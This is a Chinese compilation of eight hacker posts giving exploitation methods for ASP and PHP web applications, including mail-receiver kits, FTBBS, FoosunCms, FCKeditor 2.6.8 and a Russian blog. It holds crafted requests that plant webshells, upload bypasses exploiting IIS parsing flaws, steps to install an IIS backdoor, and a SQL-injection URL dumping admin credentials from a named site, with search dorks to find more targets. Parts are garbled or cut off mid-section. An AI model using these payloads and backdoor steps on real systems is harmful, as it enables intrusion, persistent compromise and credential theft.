天下马ASP收信程序漏洞漏洞预警(集锦8篇)
.jpg)
最近看了八进制论坛上针对伯乐ASP收信程序的漏洞分析,通过提交数据达到获取webshell的方法!正好有朋友让我帮忙看一看天下马的提交问题!主要是由于有些程序使用者自定义了一些函数,使得原来的方法不能够绕过函数,但是昨天看了看,还是可以通过其他方法实现的!
首先,天下马的其他bug我们这里就不看了,直接看提交过程!
网上公布的提交过程是类似这种的连接:
.xxx.com/post.asp?act=&d00=202&d01=
src=.a.com>&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30=天下马
&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123
返回如图1所示表示正常插入
我们来看看察看数据的页面及其部分源代码,如图2所示
但是有些程序却使用了一些自定义函数,针对提交的数据进行验证和过滤
我这里有一份代码如下:
[Copy to clipboard] [ - ]CODE:
相信很多朋友都已经看出来了,正如分析网站系统一样,这个自定义的代码只是针对Request.QueryString和Request.Form进行了过滤,没有对cookie提交的方式进行过滤!那么我们再看看天下马的获取方式
strAreaName = request(“d00”) //还有很多,只写出一个
....
....
if strAreaName “” then RS(“AreaName”) = strAreaName //还有很多,只写出一个
....
....
这个是没有经过过滤的天下马的代码,增加自定义函数的页面是将request变量经过了Function CheckStr(ChkStr)的过滤,但是还有一种提交方式就是cookie提交!下面我们看看提交方法!
首先是针对正常提交时候进行抓包分析,然后进行数据包的构造,我这里构造的包如下(这里我将真实信息修改了,^_^):
[Copy to clipboard] [ - ]CODE:
GET /post.asp?
act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d4
2=0&d50=&d51=&d98=&d99=123 HTTP/1.
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: xxx.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO;d01=;d10=
这里的数据我们只需要把通过cookie提交的数据放入cookie项中就可以了,其他可以保持不变!
然后使用NC提交!
我们来看看察看数据的页面及其部分源代码,如图3所示
成功写入!
至于利用方法我想就不需要再多写了,朋友们自己去挖掘吧!
篇2:FTBBS ASP 7.0 上传漏洞漏洞预警
< %
userid=getcookie(“clubuser_id”)
............
if Application(“FTBBSMB”)(7,0)=“M” then
inFolder=year(date)&month(date())
else
inFolder=year(date())&month(date())&day(date())
end if
call makefolder(inFolder,fso)
myFolder = inFolder&“/”&userid
call makefolder(myFolder,fso)
...................
formPath=inFolder&“/”&userid
......上传过程省略.....
建立的文件夹读取的COOKIE里的userid
修改COOKLIE里userid的值为fuck.asp形式即可建立IIS 6.0缺陷文件夹导致可以上传JPG的小马
至于修改COOKIE各位大大应该都会吧~FTBBS貌似所有版本都有此问题吧~
篇3:如何放asp后门漏洞预警
asp后门放置方法之一asp Injection,先看图一:
这是我架在本机的一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。 再看幅我就不讲了,你可以上绿盟查查tombkeeper pgn写的IIS配置文件后门这篇文章。网友czy也写了一个同样的dll程序,用法就是在ie中执行ip/*.你设写的后缀?shell=你要的命令。看一下我用它在肉鸡上做的后门吧,我是用它来解析.ph4的后缀。图7:
看到这里,你可能要说了,这个iis后门在3389终端里安装很方便,在命令行下呢?我们也有办法。iis默认安装下,会在/inetpub/adminscripts目录下生成19个vbs脚本,我们用其中的一个adsutil.vbs就可以帮我们装上这个奇妙的iis后门了。
运用方法如下,我们分8步走,看看命令行下的快乐吧:
1 copy idq.dll %systemroot%/system32/iisapi.dll
将idq.dll copy到系统盘的system32目录下,重命名为iisapid.ll
2得到虑拟站点的情况
cscript adsutil.vbs enum /p /w3svc
[/w3svc/Info]
[/w3svc/Filters]
[/w3svc/2]----------->这些就是拟虚拟站点了
[/w3svc/3]
[/w3svc/4]
[/w3svc/1]
3 得到IIS所有的有特权的DLL
adsutil.vbs set /
篇4: 游戏网站程序0DAY漏洞预警
:amxking
挖掘:百事可乐
准确点应该算是backdoor
inurl:Find.asp 您的位置 >>客服中心 >>找回密码
直接传马:
.XXX.com/user/situjiaduotu2.asp
一句话backdoor ,密码 : value
.XXX.com/htmledit/Include/upfile_class.asp
.XXX.com/htmledit\Include\DeCode.asp
读库提权:
D:\web\.xxx.com\Inc\Config.asp
篇5:FoosunCms的asp版本getshell漏洞预警
在文件\User\award\awardAction.asp中:
2
3
4
5
6
7
8
9
Integral=NoSqlHack(request.QueryString(“Integral”))
ifaction=“join”then
User_Conn.execute(“Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values(”&CintStr(prizeID)&“,'”&session(“FS_UserNumber”)&“',”&CintStr(awardID)&“)”)
'获得当前参加人数--------------------------------
User_Conn.execute(“Update FS_ME_Users set Integral=(Integral-”&Integral&“) where usernumber='”&session(“FS_UserNumber”)&“'”)
请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息
webshell还可以用来代替access
我们文件管理中上传个图片文件:
192.168.1.101/UserFiles/27015564I69/_09_27_01_10_0390446.jpg
UserNumber就是等于27015564I69
通过以上的sql注入漏洞,直接update为test.asp
192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(
退出再重新登录
生成test.asp目录,后续上传的文件都会保存在该文件中
利用iis解析漏洞获取webshell
篇6:Fckeditor2.6.8 ASP版文件上传绕过漏洞预警
exploit-db近期发布了一个FCkeditor2.6.8ASP版的一个上传绕过,不过不是很详细,只发了一个视频,是 的,可能有兄弟们看不到,转发到国内给大家看看,国内也有大牛分析过,我也一并发出来,
代码分析:
'漏洞文件:editor/filemanager/connectors/asp/commands.asp
'漏洞函数:
Sub FileUpload( resourceType, currentFolder, sCommand )
Dim oUploader
Set Uploader = New NetRube_Upload
oUploader.MaxSize = 0
oUploader.Allowed = ConfigAllowedExtensions.Item( resourceType )
oUploader.Denied = ConfigDeniedExtensions.Item( resourceType )
oUploader.HtmlExtensions = ConfigHtmlExtensions
oUploader.GetData
Dim sErrorNumber
sErrorNumber = “0”
Dim sFileName, sOriginalFileName, sExtension
sFileName = “”
If oUploader.ErrNum >0 Then
sErrorNumber = “202”
Else
' Map the virtual path to the local server path.
Dim sServerDir
sServerDir = ServerMapFolder( resourceType, currentFolder, sCommand ) '获取保存文件路径
Dim oFSO
Set FSO = Server.CreateObject( “Scripting.FileSystemObject” )
if not (oFSO.FolderExists( sServerDir ) ) then '判断文件夹是否存在
sErrorNumber = “102”
else
' Get the uploaded file name.
sFileName = oUploader.File( “NewFile” ).Name '获取上传文件名(包含后缀)
sExtension = oUploader.File( “NewFile” ).Ext '获取上传文件后缀(获取方式是文件名倒数7:的游戏箱子收信程序上传漏洞利用方法
来自:影子鹰
文章写得简洁一点,但是大家应该能看得懂!
存在这个漏洞的箱子程序还是挺多的!皇马,吉祥什么的好像都有!
首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp
CODE:
<%
Response.Buffer = True
Server.ScriptTimeOut=180
'On Error Resume Next
'dim SavePath
ExtName = ”jpg,gif,png“ '允许扩展名
SavePath =imgFolder '保存路径
If Right(SavePath,1)”/“ Then SavePath=SavePath&”/“ '在目录后加(/)
CheckAndCreateFolder(SavePath)
UpLoadAll_a = Request.TotalBytes '取得客户端全部内容
If(UpLoadAll_a<=0) Then
Response.Write ”Sorry“
Response.End
end if
Set UploadStream_c = Server.CreateObject(”ADODB.Stream“)
UploadStream_c.Type =
UploadStream_c.Open
UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
UploadStream_c.Position = 0
FormDataAll_d = UploadStream_c.Read
CrLf_e = chrB(13)&chrB(10)
FormStart_f = InStrB(FormDataAll_d,CrLf_e)
FormEnd_g = InStrB(FormStart_f 1,FormDataAll_d,CrLf_e)
Set FormStream_h = Server.Createobject(”ADODB.Stream“)
FormStream_h.Type =
FormStream_h.Open
UploadStream_c.Position = FormStart_f
UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
FormStream_h.Position = 0
FormStream_h.Type = 2
FormStream_h.CharSet = ”GB2312“
FormStreamText_i = FormStream_h.Readtext
FormStream_h.Close
FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,”\“) 1,FormEnd_g)
'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,”=“) 2,FormEnd_g)
'Response.Write FileName_j
If(CheckFileExt(FileName_j,ExtName)) Then
SaveFile = Server.MapPath(SavePath & FileName_j)
'SaveFile=SavePath & FileName_j
If Err Then
Response.Write ”Sorry“
Err.Clear
Response.End
Else
SaveFile = CheckFileExists(SaveFile)
k=Instrb(FormDataAll_d,CrLf_e&CrLf_e) 4
l=Instrb(k 1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
FormStream_h.Type=
FormStream_h.Open
UploadStream_c.Position=k-
UploadStream_c.CopyTo FormStream_h,l
FormStream_h.SaveToFile SaveFile,2
SaveFileName = Mid(SaveFile,InstrRev(SaveFile,”\“) 1)
Response.write ”OK“
Response.End
End If
Else
Response.Write ”Sorry“
Response.End
End If
%>
<%
'判断文件类型是否合格
Function CheckFileExt(FileName,ExtName) '文件名,允许上传文件类型
FileType = ExtName
FileType = Split(FileType,”,“)
For i = 0 To Ubound(FileType)
If LCase(Right(FileName,3)) = LCase(FileType(i)) then
CheckFileExt = True
Exit Function
Else
CheckFileExt = False
End if
Next
End Function
'检查上传文件夹是否存在,不存在则创建文件夹
Function CheckAndCreateFolder(FolderName)
fldr = Server.Mappath(FolderName)
Set fso = CreateObject(”Scripting.FileSystemObject“)
If Not fso.FolderExists(fldr) Then
fso.CreateFolder(fldr)
End If
Set fso = Nothing
End Function
'检查文件是否存在,重命名存在文件
Function CheckFileExists(FileName)
Set fso=Server.CreateObject(”Scripting.FileSystemObject“)
If fso.FileExists(SaveFile) Then
i=
msg=True
Do While msg
CheckFileExists = Replace(SaveFile,Right(SaveFile,4),”_“ & i & Right(SaveFile,4))
If not fso.FileExists(CheckFileExists) Then
msg=False
End If
i=i
Loop
Else
CheckFileExists = FileName
End If
Set fso=Nothing
End Function
%>
也是很简洁的一个上传代码,也存在上传漏洞,使我们想起了DVBBS的上传漏洞,自己动手写一个HTML提交页面
CODE:
然后抓包,改包”20“-”00“,NC上传就可以了~这步骤不明白的朋友可以参考一下DVBBS的上传漏洞
以上方法通杀IIS5和IIS6,还有一种方法就是针对IIS6的解析漏洞,可以上传一个1.asp;1.jpg文件也是可以的!
此外还有一个就是针对路径的问题,因为默认的上传路径是/img/
但是很多箱子的主人都把这个路径改掉了,如改成/img001/,更有甚者将目录设置的更为复杂
针对这种情况的解决方法是在包中添加”../”,添加数目可以不是一个,如果箱子主人设置的很BT的话,可以通过提交多个"../”,
在发生提交错误时,之前提交的文件就会被上传到网站的根目录了!具体情况还请大家具体分析一下!
篇8:国外一Blog程序0day漏洞预警
:YJPS 转载请注明
近来无聊 去国外网站上转悠,看到一个不错的Blog系统,可以注册用户,并分配一个二级目录,
更无聊的就去检测了下,下面是分析结果。
站点:.jj.ru/
漏洞地址:.jj.ru/include/send_email.php?comment=1074
得到用户和密码
.jj.ru/include/send_email.php?comment=1074 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,id,username,password,email),7,8,9 from blogs_database.websiteadmin_admin_users limit 1,1--
如想扩大战果,可GOOGLE里:inurl:send_email.php?comment=
漏洞危害不小,请勿借此破坏,
